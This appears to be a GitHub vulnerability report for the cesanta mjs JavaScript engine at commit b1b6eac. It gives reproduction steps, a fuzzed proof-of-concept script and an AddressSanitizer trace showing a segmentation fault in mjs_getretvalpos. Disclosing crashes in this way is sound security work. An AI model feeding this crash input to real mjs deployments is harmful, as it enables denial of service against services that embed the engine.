SEGV in mjs_getretvalpos

The name of an affected Product mjs

The affected version Commit: b1b6eac (Tag: 2.20.0)

Description An issue in cesanta mjs 2.20.0 allows a remtoe attacker to cause a denial of service via the mjs_getretvalpos function in the mjs.c file.

Vulnerability Type segmentation violation

Environment

Operating System

Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic

Compiler

Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix

Steps to Reproduce

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -fsanitize=address -DMJS_MAIN mjs.c -o mjs

poc

```` let i, a = 0, b0= 0, c = 0continu, d0, e = 0; for (i = 8; i < 20; i++) { a let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify+= i; c /= 0, c } 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}'; let o = JSON.parse(s); let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify(o)AAA ````

run command

mjs -f poc

ASAN info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
==184==The signal is caused by a READ memory access.
==184==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
    #0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
    #1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
    #2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
    #3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
    #4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
    #5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
    #6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
    #7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
    #8 0x4efa40 in mjs_exec_file (/mjs/mjs+0x4efa40)
    #9 0x4f75b9 in main (/mjs/mjs+0x4f75b9)
    #10 0x7ff84ed49c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x41b7f9 in _start (/mjs/mjs+0x41b7f9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57 in vasprintf
==184==ABORTING

cesanta / mjs

SEGV in mjs_getretvalpos #251